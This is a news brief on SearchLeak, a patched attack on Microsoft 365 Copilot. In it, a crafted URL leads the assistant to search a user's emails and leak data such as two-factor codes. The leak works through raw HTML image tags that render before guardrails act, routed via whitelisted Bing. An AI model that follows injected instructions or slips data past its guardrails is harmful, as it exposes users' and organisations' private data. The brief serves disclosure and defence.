Microsoft patched critical vulnerabilities in Copilot that allowed attackers to steal two-factor authentication codes and other sensitive enterprise data through a technique called SearchLeak.

What happened: Researchers discovered that attackers could send victims a specially crafted URL that caused Copilot to search the user's emails, extract information, and exfiltrate it to an attacker-controlled server. The attack exploited a timing gap in Copilot's safety guardrails—before protection mechanisms could wrap output in code blocks, the application generated raw HTML that included image tags, causing the user's browser to send HTTP requests containing stolen data. Bing search, which is whitelisted in Copilot's content security policy, was used as an intermediary to route the requests to the attacker's domain. Microsoft fixed the vulnerabilities on Tuesday.

Why it matters: The vulnerability targeted the Enterprise tier of Microsoft 365, meaning attackers could access not just personal data but anything an organization's user could see—emails, meeting invites, notes, SharePoint documents, OneDrive files, and other indexed business content. Depending on how M365 is configured, the blast radius could extend even wider across the environment. This demonstrates that even as Microsoft patches individual attack chains, researchers note there is no known way to fix the underlying cause of such vulnerabilities, suggesting similar exploits may emerge in the future.

What to watch: The researchers named the attack SearchLeak and published their findings on Monday. Because the attack relies on a fundamental gap between when Copilot streams output and when safety guardrails activate, the cat-and-mouse cycle between attackers finding new circumventions and Microsoft constructing new protections is likely to continue.